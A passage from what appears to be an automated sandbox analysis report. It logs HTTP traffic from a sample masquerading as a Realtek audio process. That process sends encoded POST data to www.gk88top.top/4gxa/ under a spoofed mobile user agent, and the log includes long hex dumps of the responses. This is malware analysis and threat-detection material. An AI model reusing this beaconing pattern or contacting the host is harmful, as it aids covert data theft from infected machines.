                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:48:59.969959974 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:48:59.969966888 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:48:59.969974995 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:48:59.970016003 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:48:59.971833944 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                  Dec 3, 2024 09:49:00.326546907 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                  Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  21192.168.11.3049885104.21.7.187805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:05.911854982 CET669OUTPOST /4gxa/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.gk88top.top
                                                                                                  Referer: http://www.gk88top.top/4gxa/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 58 67 31 68 6e 79 77 32 64 78 44 61 7a 70 36 78 4b 56 4d 4a 44 59 50 33 45 37 5a 35 44 36 34 4b 47 52 39 42 5a 44 31 38 59 33 4a 6e 72 4f 7a 65 7a 57 38 49 30 76 59 54 42 73 49 69 2f 72 4a 42 59 30 4c 34 63 6b 77 49 36 76 66 6c 59 63 56 56 42 30 64 73 6f 31 44 6a 32 53 38 47 77 53 6a 33 32 31 57 42 4f 4c 69 32 39 71 36 71 65 46 76 79 2f 70 32 62 51 4b 54 4c 7a 49 32 2b 42 38 75 53 6a 67 69 64 30 54 51 77 74 6a 43 67 5a 33 51 6e 69 5a 71 52 59 4d 4a 6c 54 76 66 32 70 6e 32 4d 52 7a 4a 62 63 67 39 6c 53 4c 66 38 34 31 73 62 38 32 32 2b 71 7a 44 59 30 62 49 4b 74 76 73 34 41 3d 3d
                                                                                                  Data Ascii: 6aonl5x=FXg1hnyw2dxDazp6xKVMJDYP3E7Z5D64KGR9BZD18Y3JnrOzezW8I0vYTBsIi/rJBY0L4ckwI6vflYcVVB0dso1Dj2S8GwSj321WBOLi29q6qeFvy/p2bQKTLzI2+B8uSjgid0TQwtjCgZ3QniZqRYMJlTvf2pn2MRzJbcg9lSLf841sb822+qzDY0bIKtvs4A==
                                                                                                  Dec 3, 2024 09:49:06.602649927 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:06 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hd8oVd7SQEoQiBowtksh3V7C8H3Isu1c6uMW5nhTTE37pWxPwirJGrlVGCmbVOhGgFL5oeIWmzdYbQ3iH3CJTgMgvAkP9TUtthBBxuIH6xGV8tPm9m0L1zVPh0aMZYPafJA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24d2c386d729e-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=103036&min_rtt=103036&rtt_var=51518&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/
                                                                                                  Dec 3, 2024 09:49:06.602660894 CET26INData Raw: d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                                                  Data Ascii: WF8X.C?
                                                                                                  Dec 3, 2024 09:49:07.170185089 CET1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                                                  Dec 3, 2024 09:49:07.170196056 CET1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                                                  Dec 3, 2024 09:49:07.170253038 CET1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                                                  Dec 3, 2024 09:49:07.170305014 CET1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                                                  Dec 3, 2024 09:49:07.170312881 CET1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                                                  Dec 3, 2024 09:49:07.170321941 CET1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                                                  Dec 3, 2024 09:49:07.170329094 CET1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                                                  Dec 3, 2024 09:49:07.170383930 CET1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>
                                                                                                  Dec 3, 2024 09:49:07.170427084 CET1289INData Raw: 6b a4 fa ba 32 b2 85 86 66 b1 6d 99 74 b8 85 f5 24 a4 fb 2e 60 4e 17 c2 ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56
                                                                                                  Data Ascii: k2fmt$.`NFu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OT


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  22192.168.11.3049886104.21.7.187805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:08.548435926 CET689OUTPOST /4gxa/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.gk88top.top
                                                                                                  Referer: http://www.gk88top.top/4gxa/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 6e 4a 6e 4b 65 7a 66 79 57 38 4c 30 76 59 59 68 73 48 6d 2f 72 4f 42 5a 49 44 34 64 59 77 49 36 72 66 6c 61 45 56 55 32 67 53 76 59 30 6c 72 57 53 79 43 77 53 6a 33 32 31 57 42 4f 66 59 32 39 79 36 72 75 31 76 79 61 64 35 59 51 4b 51 43 54 49 32 36 42 38 71 53 6a 67 63 64 31 2f 36 77 76 62 43 67 59 48 51 6b 7a 59 59 59 59 4d 4c 34 44 75 4f 39 61 32 79 49 79 66 75 55 64 38 57 6c 51 6e 6a 77 50 59 32 47 2f 43 30 74 4b 50 75 45 31 32 67 49 76 75 33 6c 44 51 39 41 74 30 4b 75 42 67 55 66 54 47 43 45 30 78 75 4c 6c 67 3d
                                                                                                  Data Ascii: 6aonl5x=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8unJnKezfyW8L0vYYhsHm/rOBZID4dYwI6rflaEVU2gSvY0lrWSyCwSj321WBOfY29y6ru1vyad5YQKQCTI26B8qSjgcd1/6wvbCgYHQkzYYYYML4DuO9a2yIyfuUd8WlQnjwPY2G/C0tKPuE12gIvu3lDQ9At0KuBgUfTGCE0xuLlg=
                                                                                                  Dec 3, 2024 09:49:09.201355934 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:09 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYjIlXQ1wx%2BXFIFU5E%2FuMUz7xArac29dYoP%2FRK3haec%2BPQLkaZOrP26Audjc8g9JUqxyAZC6iETP%2Fnfh%2B%2FqakeezBipfPBEhFEIwXuM22pfbEG2ND6D8H42N8gVNgk5sxok%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24d3cba4341a1-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102747&min_rtt=102747&rtt_var=51373&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=689&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,
                                                                                                  Dec 3, 2024 09:49:09.201373100 CET40INData Raw: 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                                                  Data Ascii: @i8mVv/WF8X.C?
                                                                                                  Dec 3, 2024 09:49:09.730315924 CET1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                                                  Dec 3, 2024 09:49:09.730391979 CET1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                                                  Dec 3, 2024 09:49:09.730413914 CET1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                                                  Dec 3, 2024 09:49:09.730422974 CET1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                                                  Dec 3, 2024 09:49:09.730433941 CET1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                                                  Dec 3, 2024 09:49:09.730443954 CET1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                                                  Dec 3, 2024 09:49:09.730508089 CET1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                                                  Dec 3, 2024 09:49:09.730564117 CET1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>
